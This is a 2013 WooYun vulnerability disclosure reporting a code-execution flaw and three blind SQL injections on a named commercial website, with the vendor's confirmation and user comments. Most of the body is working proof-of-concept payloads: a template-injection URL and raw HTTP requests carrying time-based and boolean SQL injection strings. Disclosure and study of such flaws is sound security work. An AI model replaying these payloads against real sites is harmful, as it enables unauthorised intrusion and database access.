当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020097

漏洞标题:亿邦动力网某网站代码执行漏洞和SQL盲注

相关厂商:亿邦动力网

漏洞作者: lucky

提交时间:2013-03-15 14:35

修复时间:2013-04-29 14:36

公开时间:2013-04-29 14:36

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-15: 细节已通知厂商并且等待厂商处理中
2013-03-19: 厂商已经确认,细节仅向厂商公开
2013-03-29: 细节向核心白帽子及相关领域专家公开
2013-04-08: 细节向普通白帽子公开
2013-04-18: 细节向实习白帽子公开
2013-04-29: 细节向公众公开

简要描述:

亿邦动力网某网站代码执行漏洞

详细说明:

代码执行漏洞:

http://www.siilu.com//shop/100501/infocase/%24%7b%40print(md5(admin))%7d


9.PNG


10.PNG


SQL盲注3枚:

POST /companyuser/dob2b HTTP/1.1
Content-Length: 1540
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_FBRHYGUKBC
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_IXNSIQEDQH
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="city"
0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="company_site"
Acunetix
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="contact"
1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="mail"
sample@email.tst
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass2"
g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass_word"
g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone1"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="province"
0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="qq"
1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="telphone"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="usertype"
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="user_name"
kgoyghag' or (sleep(2)+1) limit 1 --
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="__hash__"
54c0fa6632d2db7653113cafae62bb45
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="logo"; filename=""
Content-Type:
-------AcunetixBoundary_IXNSIQEDQH--


11.PNG


http://www.siilu.com/index/clue?clueid=-1%20or%2011=11


12.PNG


13.PNG


GET /product/topcategory/?category_id=-1'%20or%20'91'%3d'92&city=&pagenum=4&sorted= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*


GET /ques/getfaq/?f=ajax&quesid=-1%20or%20100%3d98 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*


漏洞证明:

代码执行漏洞:

http://www.siilu.com//shop/100501/infocase/%24%7b%40print(md5(admin))%7d


9.PNG


10.PNG


SQL盲注3枚:

POST /companyuser/dob2b HTTP/1.1
Content-Length: 1540
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_FBRHYGUKBC
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_IXNSIQEDQH
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="city"
0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="company_site"
Acunetix
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="contact"
1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="mail"
sample@email.tst
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass2"
g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass_word"
g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone1"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="province"
0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="qq"
1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="telphone"
555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="usertype"
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="user_name"
kgoyghag' or (sleep(2)+1) limit 1 --
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="__hash__"
54c0fa6632d2db7653113cafae62bb45
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="logo"; filename=""
Content-Type:
-------AcunetixBoundary_IXNSIQEDQH--


11.PNG


http://www.siilu.com/index/clue?clueid=-1%20or%2011=11


12.PNG


13.PNG


GET /product/topcategory/?category_id=-1'%20or%20'91'%3d'92&city=&pagenum=4&sorted= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*


GET /ques/getfaq/?f=ajax&quesid=-1%20or%20100%3d98 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*


修复方案:

版权声明:转载请注明来源 lucky@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2013-03-19 12:58

厂商回复:

感谢lucky

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-16 11:30 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    有两个都不审核了。后面看见有三个严重问题现在都懒得提交了,免得又不审核浪费感情啊

  2. 2013-03-17 13:19 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    @wefgod 好好留着,等厂商有确认了!再提交呵呵!

  3. 2013-03-18 10:33 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @lucky 是乌云这不审核···不是长沙不确认。

  4. 2013-03-18 10:33 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    厂商,打错字了,纠结的拼音啊

  5. 2013-03-18 10:46 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    @wefgod 了解!我也有在审核的,一直不过!纠结!哎。。。。

  6. 2013-03-18 15:39 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @lucky 一般过3天5天的,审核的可能性就基本没了